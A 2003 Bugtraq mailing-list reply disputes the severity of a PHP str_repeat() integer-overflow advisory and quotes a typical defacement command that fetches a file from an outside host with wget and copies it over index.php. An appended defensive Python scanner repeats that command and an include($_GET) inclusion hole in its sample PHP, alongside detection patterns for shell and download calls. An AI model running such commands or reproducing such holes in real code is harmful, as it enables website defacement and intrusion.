Date: Thu, 3 Apr 2003 08:39:03 +0200
From: Goran Krajnovic <goran.krajnovic@...et.hr>
To: bugtraq@...urityfocus.com
Subject: Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function



On 2003.04.01 14:29 Sir Mordred wrote:
> The implementation of this function suffers from a simple integer overflow
> caused by a very long second argument and could allow a local/remote attacker
> in the worst case to gain control over the web server.

This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with
the user-id of the web server process (usually a low privilege user like
'nobody' or 'apache'). Exploiting one (of many) bugs in PHP to 'gain control
over the web server' is like getting a remote shell on a machine and then
running a buffer overflow exploit in order just to be able to run commands
instead of typing them into the shell directly.

If an attacker has the opportunity to execute PHP code of his choice on a
target server [1], he does not need to exploit a buffer overflow in PHP just to
get the privileges of the web server user - he already runs code with the
privileges of that user. And having the ability to run PHP code gives him just
about the same level of power as getting a non-root shell on the box.

Searching on http://bugs.php.net will give you a lot more ways to crash PHP,
and probably a number of these can be used to get a buffer overflow, but I
don't think that reporting each of them here will solve anything. Report them
to http://bugs.php.net.

[1] Usually by exploiting some of the poor programming practices in some PHP
applications, misconfigurations, or bugs. See
http://www.securityfocus.com/bid/3889 for example. In a typical attack, this is
used to execute code, and the code is usually system('wget
http://another.exploited.host/defaced-index.php'); system('cp defaced-index.php
index.php') or similar.

-- 
Goran Krajnović,  dipl. ing.
[ Goran.Krajnovic@...et.hr ]
 Hrvatski Telekom - HThinet
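A defender's illustration of footnote [1], added here and not part of the original post or of PHP: a small Python scanner (hypothetical, my own) that walks PHP sources found in a webroot and flags shell-execution calls that fetch and overwrite files, plus include/require statements fed directly from request input, the kind of programming practice that hands an attacker PHP-level code execution in the first place. The sample PHP files are constructed.

```python
import re

# Constructed sample PHP sources standing in for files found in a webroot.
SAMPLES = {
    "index.php": "<?php echo 'hello'; ?>",
    "upload.php": ("<?php system('wget http://another.exploited.host/defaced-index.php');"
                   " system('cp defaced-index.php index.php'); ?>"),
    "view.php": "<?php include($_GET['page']); ?>",
}

# PHP functions that hand a string to a shell (the post's system('...') case).
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
SHELL_CALL = re.compile(
    r"\b(" + "|".join(SHELL_FUNCS) + r")\s*\(\s*(['\"])(.*?)\2", re.S)
# Download tools inside a shell argument: the "wget <url>" stage of the attack.
DOWNLOADER = re.compile(r"\b(wget|curl|fetch)\b")
# include/require driven straight from request data (remote/local file inclusion).
INCLUDE_OF_INPUT = re.compile(
    r"\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)\b")


def scan_php(source):
    """Return a list of (kind, detail) findings for one PHP source string."""
    findings = []
    for m in SHELL_CALL.finditer(source):
        func, arg = m.group(1), m.group(3)
        kind = "download-and-execute" if DOWNLOADER.search(arg) else "shell-exec"
        findings.append((kind, f"{func}({arg!r})"))
    for m in INCLUDE_OF_INPUT.finditer(source):
        findings.append(("include-from-request", m.group(0)))
    return findings


def scan_files(files):
    """Map file name -> findings, keeping only files with at least one hit."""
    report = {}
    for name, source in files.items():
        hits = scan_php(source)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        for kind, detail in hits:
            print(f"{name}: {kind}: {detail}")
```

Hits on shell-execution functions are also the list an administrator would put into php.ini's disable_functions, which removes the shell step of the attack even when application code remains exploitable.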

